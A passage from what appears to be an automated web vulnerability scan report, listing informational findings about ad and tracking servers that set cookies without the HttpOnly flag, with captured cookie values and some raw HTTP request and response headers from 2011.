ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615->E6)M-i; expires=Mon, 02-Jul-2012 03:28:17 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.71. http://amch.questionmarket.com/adsc/d909615/2/200214693346/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d909615/2/200214693346/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CS1=deleted; expires=Wed, 12-May-2010 11:15:50 GMT; path=/; domain=.questionmarket.com
CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_200214693346-2-1; expires=Mon, 02-Jul-2012 03:15:51 GMT; path=/; domain=.questionmarket.com
ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-*66)M-0; expires=Mon, 02-Jul-2012 03:15:51 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.72. http://amch.questionmarket.com/adsc/d909615/2/912024/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d909615/2/912024/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CS1=deleted; expires=Wed, 12-May-2010 11:15:51 GMT; path=/; domain=.questionmarket.com
CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_912024-2-1; expires=Mon, 02-Jul-2012 03:15:52 GMT; path=/; domain=.questionmarket.com
ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-.66)M-0; expires=Mon, 02-Jul-2012 03:15:52 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.73. http://amch.questionmarket.com/adsc/d909615/2/912025/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d909615/2/912025/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CS1=deleted; expires=Wed, 12-May-2010 11:28:16 GMT; path=/; domain=.questionmarket.com
CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-2_912026-2-1_912025-2-1; expires=Mon, 02-Jul-2012 03:28:17 GMT; path=/; domain=.questionmarket.com
ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615->E6)M-i; expires=Mon, 02-Jul-2012 03:28:17 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:28:17 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a209.dl
Set-Cookie: CS1=deleted; expires=Wed, 12-May-2010 11:28:16 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-2_912026-2-1_912025-2-1; expires=Mon, 02-Jul-2012 03:28:17 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615->E6)M-i; expires=Mon, 02-Jul-2012 03:28:17 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.74. http://amch.questionmarket.com/adsc/d909615/2/912026/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d909615/2/912026/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CS1=deleted; expires=Wed, 12-May-2010 11:27:45 GMT; path=/; domain=.questionmarket.com
CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-1_912026-2-1; expires=Mon, 02-Jul-2012 03:27:46 GMT; path=/; domain=.questionmarket.com
ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615->E6)M-D; expires=Mon, 02-Jul-2012 03:27:46 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.75. http://amch.questionmarket.com/adsc/d909615/2/912027/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d909615/2/912027/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CS1=deleted; expires=Wed, 12-May-2010 11:27:24 GMT; path=/; domain=.questionmarket.com
CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-1; expires=Mon, 02-Jul-2012 03:27:25 GMT; path=/; domain=.questionmarket.com
ES=887938-)J/(M-gg_910169-vu<(M-0_908257-'g^(M-n1_887443-Rl^(M-0_887955-|o^(M-ad1_909615-(E6)M-0; expires=Mon, 02-Jul-2012 03:27:25 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.76. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=25894b9d-24.143.206.177-1303083414; expires=Sat, 11-May-2013 11:04:16 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.77. http://bing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bing.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_HOP=I=1&TS=1305197971; domain=bing.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1758908&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b2c&W=1; NAP=V=1.9&E=ad2&C=4Z4hoC0UMdOLFTOoUFdt8MycOkKr26b778UQ7Rv4sDujYgzPjPTdfw&W=1; _RwBf=credit=-1; _FP=BDCE=129497049165851875&BDCEH=D52195A634D5E967FDE7349182741915

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Location: http://www.bing.com/
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Edge-control: no-store
Set-Cookie: _HOP=I=1&TS=1305197971; domain=bing.com; path=/
Date: Thu, 12 May 2011 10:59:31 GMT

14.78. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A3=iz6taL7W0bnA00001iVAzaL8z0clo00001iVAyaL8w0clo00001jlP8aJjE0dpH00001iLxqaLMH07l000001iLznaM7707l000001jz2OaLMO0cEf00001iRpfaL7W0c9M00001jpdKaLsn073a00002juYhaL6q07Kl00001jFU0aLQg0duS00001jFT.aLQg0duS00001kgh7aLQg02WG00001jelLaL7W07pd00002jAsGaJH602WG00003jBofaIOs07Si00001iLaRaL9K0bnA00001iRoBaLsa0c9M00001isyIaL8z02WG00001; expires=Wed, 10-Aug-2011 07:03:16 GMT; domain=.serving-sys.com; path=/
B3=82s80000000002uy8Whx0000000003uu9wtb0000000001ur9qGw0000000002uz9oDg0000000001ut97QM0000000001uA97QP0000000001uB9vHV0000000001uA910k0000000001uz9X5k0000000001uA910n0000000001uy98nW0000000001uy9c210000000002uy9yEe0000000001uA8SAT0000000001uy96EU0000000001uy7dOu0000000001uy9yEg0000000001uA; expires=Wed, 10-Aug-2011 07:03:16 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.79. http://cf.addthis.com/red/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cf.addthis.com
Path:	/red/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

di=1304431085.1FE|1304431085.1OD|1304431085.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 11:49:36 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.80. http://core.insightexpressai.com/adServer/adServerESI.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://core.insightexpressai.com
Path:	/adServer/adServerESI.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

IXAIBanners2554=175183,175237; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
IXAIFirstHit2554=5%2f12%2f2011+7%3a38%3a14+AM; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/
IXAILastHit2554=5%2f12%2f2011+7%3a38%3a14+AM; domain=.insightexpressai.com; expires=Thu, 12-May-2016 12:00:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.81. http://cspix.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cspix.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

acs=014020a0g0h1lkaebsxzt1sl6yxzt1sl6yxzt1p28s; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:38 GMT; Path=/
clid=2lkaebs01171xcfgwn0ixqhg0sl6y0063o010k03505; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:38 GMT; Path=/
rdrlst=4041194lkmm960cube0043o0110rdll12l4000000023o010znmlkmhha000000053o0110tell2ziq000000013o01; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:38 GMT; Path=/
sglst=20k0s9ullkzgkk03iy60023n000k00500arrll12l401wxm0013n000k00500c25ll2ziq000000013o010k0150156bll2ziq000000013o010k01501ag2lkmm960gd9k0043o010k035049rylkmhha0cz3a0023f000j00500a6slkzgkk03iy60023n000k00500bnzlkmhha0gi1g0043n000k00500cgzlkmhha0gi1g0043n000k005000tilkmhha0gi1g0053o010k03505ahhll2ziq000000013o010k015010klll12l401wxm0023o010k02502a6rlkmhha0cz3a0023f000j00500dlell12l401wxm0023o010k02502abflkmhha0cz3a0023f000j00500bo0ll2ziq000000013o010k01501alhll2ziq000000013o010k01501dg4lkmhha0gi1g0043n000k00500942ll2ziq000000013o010k01501943lkzgkk03iy60023n000k00500; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:38 GMT; Path=/
vstcnt=417s010r044smk6127p10024nnav218e202206203210724j2vl118e10f238ca131p10d2; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:38 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.82. http://da.newstogram.com/hg.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://da.newstogram.com
Path:	/hg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7; expires=Fri, 11-May-2012 11:37:35 GMT; domain=.newstogram.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.83. http://domdex.com/f previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://domdex.com
Path:	/f

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

k=find+lawyers+in+your+area-107-1305201713.abc+go-14-1304511016.dating%2Cdating+site%2Conline+dating%2Csingle%2Cfree+dating%2Cdating+services%2Cdatehookup+online+dating%2Clove%2Cromance%2Cdating+service%2Csingle+woman%2Cdating+tip%2Csingle+cruise%2Cspeed+dating%2Csingle+chat%2Cteen+dating-42-1304076634.enterprises%2Creal+estate%2Capartment+for+rent%2Ccheap+airfare%2Cvacation+packages%2Cvegas+vacation%2Ccancun+hotel%2Cnew+cars%2Chybrid+cars%2Cdigital+cameras%2Ccell+phones%2Cringtones%2Cinternet+service%2Claptops%2Csoftware%2Ce+mail-42-1304076188.free+music-107-1303534187.free+music-107-1303534176.high+speed+internet+service-107-1303432104.free+live+porn-14-1303432099.fleet+management-107-1303432080_; expires=Wed, 10-Aug-2011 12:01:53 GMT
r=2521.2863.3148.3586.5452.5454.423.426.433.434.436.441.450.453.457.507.508.1683.1686.1690.1691.1849.2145.421.4605.1575.1956.2161.2162.2163.2405.2691.2921.2888.3127.3949.3952.3953.4913.4915.4949.4952.4953.5042.5294.5362.5449.5520.5530.297.304.428.440.442.443.455.459.460.463.464.511.116.429.1695.1804.257.419.2968.3937.432.4606.510.5211.5324.1850.302.4844.4853.2890.5231.444.449.1185.1212.1422.1573.418.5220.4914.4927.2650.4877_; expires=Wed, 10-Aug-2011 12:01:53 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /f?c=107&k=find%20lawyers%20in%20your%20area HTTP/1.1
Host: domdex.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dex=1; k=abc+go-14-1304511016.dating%2Cdating+site%2Conline+dating%2Csingle%2Cfree+dating%2Cdating+services%2Cdatehookup+online+dating%2Clove%2Cromance%2Cdating+service%2Csingle+woman%2Cdating+tip%2Csingle+cruise%2Cspeed+dating%2Csingle+chat%2Cteen+dating-42-1304076634.enterprises%2Creal+estate%2Capartment+for+rent%2Ccheap+airfare%2Cvacation+packages%2Cvegas+vacation%2Ccancun+hotel%2Cnew+cars%2Chybrid+cars%2Cdigital+cameras%2Ccell+phones%2Cringtones%2Cinternet+service%2Claptops%2Csoftware%2Ce+mail-42-1304076188.free+music-107-1303534187.free+music-107-1303534176.high+speed+internet+service-107-1303432104.free+live+porn-14-1303432099.fleet+management-107-1303432080_; r=2521.2863.3148.3586.5452.5454.423.426.433.434.436.441.450.453.457.507.508.1683.1686.1690.1691.1849.2145.421.4605.1575.1956.2161.2162.2163.2405.2691.2921.2888.3127.3949.3952.3953.4913.4915.4949.4952.4953.5042.5294.5362.5449.5520.5530.297.304.428.440.442.443.455.459.460.463.464.511.116.429.1695.1804.257.419.2968.3937.432.4606.510.5211.5324.1850.302.4844.4853.2890.5231.444.449.1185.1212.1422.1573.418.5220.4914.4927.2650.4877_

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:01:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, no-cache
Set-Cookie: k=find+lawyers+in+your+area-107-1305201713.abc+go-14-1304511016.dating%2Cdating+site%2Conline+dating%2Csingle%2Cfree+dating%2Cdating+services%2Cdatehookup+online+dating%2Clove%2Cromance%2Cdating+service%2Csingle+woman%2Cdating+tip%2Csingle+cruise%2Cspeed+dating%2Csingle+chat%2Cteen+dating-42-1304076634.enterprises%2Creal+estate%2Capartment+for+rent%2Ccheap+airfare%2Cvacation+packages%2Cvegas+vacation%2Ccancun+hotel%2Cnew+cars%2Chybrid+cars%2Cdigital+cameras%2Ccell+phones%2Cringtones%2Cinternet+service%2Claptops%2Csoftware%2Ce+mail-42-1304076188.free+music-107-1303534187.free+music-107-1303534176.high+speed+internet+service-107-1303432104.free+live+porn-14-1303432099.fleet+management-107-1303432080_; expires=Wed, 10-Aug-2011 12:01:53 GMT
Set-Cookie: r=2521.2863.3148.3586.5452.5454.423.426.433.434.436.441.450.453.457.507.508.1683.1686.1690.1691.1849.2145.421.4605.1575.1956.2161.2162.2163.2405.2691.2921.2888.3127.3949.3952.3953.4913.4915.4949.4952.4953.5042.5294.5362.5449.5520.5530.297.304.428.440.442.443.455.459.460.463.464.511.116.429.1695.1804.257.419.2968.3937.432.4606.510.5211.5324.1850.302.4844.4853.2890.5231.444.449.1185.1212.1422.1573.418.5220.4914.4927.2650.4877_; expires=Wed, 10-Aug-2011 12:01:53 GMT
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="ALL CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 0

14.84. http://ds.addthis.com/red/psi/sites/www.elawmarketing.com/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.elawmarketing.com/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

di=%7B%7D..1305200976.1FE|1305201657.1OD|1305200976.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 12:00:57 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.85. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.pomerantzlaw.com/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

di=%7B%7D..1305200976.1FE|1305200976.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 11:49:36 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.86. http://engine.cmmeglobal.com/v1/page-view previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://engine.cmmeglobal.com
Path:	/v1/page-view

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

s=7ccc61886178d12fe3dffbb8492bd50c; Expires=Thu, 12-May-2011 11:33:17 GMT; Path=/
t=version!2|id!6da05d50dbb5512fb25ecc09aa925f2e|time_stamp!1304367647753|sv!eba806786ff9ab6d4fc54816a6e60cfa|; Expires=Sat, 20-Aug-2011 11:03:17 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/page-view?acctid=ft&t=1305198189088&tzo=300&pgid=EEBE6C0A-E683-4F1C-A7BB-5D56FDDB3EE8&nplg=9&hstl=1&scrh=1200&scrw=1920&scrd=16 HTTP/1.1
Host: engine.cmmeglobal.com
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t=version!2|id!6da05d50dbb5512fb25ecc09aa925f2e|time_stamp!1304367647753|sv!eba806786ff9ab6d4fc54816a6e60cfa|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache,must-revalidate
Expires: -1
Pragma: public
P3P: policyref="/w3c/p3p.xml",CP="NON DSP LAW CUR DEV TAI PSA IVA OUR BUS UNI"
Set-Cookie: s=7ccc61886178d12fe3dffbb8492bd50c; Expires=Thu, 12-May-2011 11:33:17 GMT; Path=/
Set-Cookie: t=version!2|id!6da05d50dbb5512fb25ecc09aa925f2e|time_stamp!1304367647753|sv!eba806786ff9ab6d4fc54816a6e60cfa|; Expires=Sat, 20-Aug-2011 11:03:17 GMT; Path=/
Content-Type: text/plain;charset=UTF-8
Content-Length: 0
Date: Thu, 12 May 2011 11:03:17 GMT

14.87. http://idpix.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idpix.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

clid=2lkaebs01171xcfgwn0ixqhg0sl750073o020k04506; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:45 GMT; Path=/
rdrlst=4041194lkmm960cube0053o0210rdll12l4000000033o020znmlkmhha000000063o0210tell2zip000000023o02; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:45 GMT; Path=/
sglst=20k0s9ullkzgkk03iy50023n000k00500arrll12l401wxl0013n000k00500c25ll2zip000000023o020k0250256bll2zip000000023o020k02502ag2lkmm960gd9r0053o020k045059rylkmhha0cz3a0023f000j00500a6slkzgkk03iy50023n000k00500bnzlkmhha0gi1f0043n000k00500cgzlkmhha0gi1f0043n000k005000tilkmhha0gi1n0063o020k04506ahhll2zip000000023o020k025020klll12l401wxl0033o020k03503a6rlkmhha0cz3a0023f000j00500dlell12l401wxl0033o020k03503abflkmhha0cz3a0023f000j00500bo0ll2zip000000023o020k02502alhll2zip000000023o020k02502dg4lkmhha0gi1f0043n000k00500942ll2zip000000023o020k02502943lkzgkk03iy50023n000k00500; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:45 GMT; Path=/
vstcnt=417s010r044smk6127p10024nnav218e202206203210724j2vl118e10f238ca131p10d2; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:45 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.88. http://js.revsci.net/gateway/gw.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

udm_0=MLvv9C8Nbjpr557JDEzV6Qmy8vzjOnVlM1b8qoT6P/6jKqFB/AArMvE354eECpVFUpsB/ryF27g64s1oM+s/x82jWjDWUitF+udc3DBM6vFMHdu5LWXcWh1waMn+vD2Pi/6/opLpmA7/Gh0bU5IV0Qrx9dc6VHrKAlCT+hfLClNEUrJSkl2S16oTX7CbgSzypfrpc5VLHYI4c+tj2HEl9lfUdyQ9pWp2gRt3PQ1W9TQEiWXYkLtOkMeKKdqenqP8xd8DJgB9Wm9RFff5Q+bgLy4ePU1qoWyXDHQhYYX7yWeCZeEqilf95qoJAOocGO3qM+iYrceWGHRZq93uAomiKPWg7Z+zLzxGPJDp/fKjMPujah8JN+oi+DaZrQIKIYG6g2TSG1vnYEMZ2JbZVTVZhDxARFZleeWURff9Wx751+tKHaMu/xn3RYaKszrGZA6RlwCt+NuqPoznRX4vck+HldWUVG1A1qbpn3rL2sb/MVkLJXjka3vTLDQkmdGZktW+0pu0LESzKT7GnaXO5eZ+dSyKkA4Q48QAd77LWt2RfYKKjVpi9R/R1/W/RIUlUmivDsAZun9Uj65R1/ShixxdBZtXiudcxuvCsvcW/IdlomzTs7FHCC6AgFwCuDGL4ricj7NcRFR4JxEj7vN++KZFIy18++/lbJXdRgytPK59o4PzVl0T2OcajqS3RSO9NBPwab9+86ccnLs8ds1bjsFzEzKdf/V0iuMCNT7mRXjbxqJdzNQ2zz72+8KSOE9dc/lBj4aC/SyO3LegBHbbnrDHp+grjq8BMcNbn89X3XvY0r/Y8TxrMsLt20IVNBrHwqXzvLeRHtLmVV8weNvSWfkfe5sUSUrPZ1hobafq3mgOKAjfS7tG/VRENDOG21AH7Aspp8ZZAP4A7faTxGwUqJdFHvML5BWA1W48dpbdADNo3WtKmMY4HYawF8Ar2+H04UdeyvCc5nvQgoItg43GpvfcBLVk3+vCQB0wCo2nk3lJqm95+kCZG278se39Cw/iLIG1S3U9l8Fk6j1ydFvxo312YEoSNKI2370IUuJN2kcNHEQRxTLaRjWz9sNRM7mM5TSklUq76M/CaknlqZWm96YXib3fE5d29SK6/9opQVO5ZxJ1GnDnBa9Wu3wg1ngult5Gjm0pyTLRF5YiMj6e8lD2uBVjnTvz9hMTUO56RQBkZMwSiXRTs0QeV0NSQWJBbpg9J19+PqYrvnGFvj1q/LjTeriUaRU9gS2r+Pip5bOvrFA6kBzDJPzJiiYsNl5AwprDcx7KIxZMWNaHqhupRp5HKeDVtNBbHkuhxmbEzAemNrX58a+ern0c60eE/Ti9RfCOzrACEKzCE5EFzwS5Wpi4ek7JevMmowSdz+NZEmFg4WyzC1T0WJ+hNjJ3NNrjWRwjVM/Gf3tTRx6iX2j0PyDr//pq2pdZXZ7YD/zcp8n7qoNWRZbE6V7AEvfIY1u3o7lUJkRzOJRd2VBo28NOxEfzMDFtbZ1gAlvX5g==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:11 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.89. http://lfov.net/webrecorder/g/chimera.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lfov.net
Path:	/webrecorder/g/chimera.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LOOPFUSE=6839ce2a-0bad-40a6-a65f-c621a7d51f1a; Expires=Fri, 11-May-2012 12:10:11 GMT
Coyote-2-405e0b67=405e0b12:0; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webrecorder/g/chimera.js?vid=null HTTP/1.1
Host: lfov.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.csscorp.com/
Cookie: Coyote-2-405e0b67=405e0b12:0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
